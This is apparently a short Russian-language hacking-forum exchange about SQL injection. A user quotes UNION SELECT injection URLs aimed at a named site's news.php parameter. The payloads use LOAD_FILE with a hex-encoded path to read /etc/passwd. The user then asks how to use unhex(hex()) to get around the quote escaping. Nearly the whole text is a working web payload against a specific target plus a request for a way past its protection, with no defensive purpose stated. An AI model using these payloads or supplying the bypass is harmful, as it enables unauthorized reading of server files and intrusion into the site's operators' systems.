Сообщение от
n0ne
jokester, например в load_file()
Покажи как , вот пост из топика SQL:
Проверяем файл прив:
http://www.greenshift.com/news.php?id=97+union+select+1,LOAD_FILE(0x2f657463 2f706173737764),3,4,5,6,7,8,9,10,11,12/*
Есть файл
Смотрим ковычки:
http://www.greenshift.com/news.php?id=97+union+select+1,LOAD_FILE('/etc/passwd'),3,4,5,6,7,8,9,10,11,12/*
LOAD_FILE(\'/etc/passwd\')
Экранирует
Как их обойти с помощью unhex(hex()) ?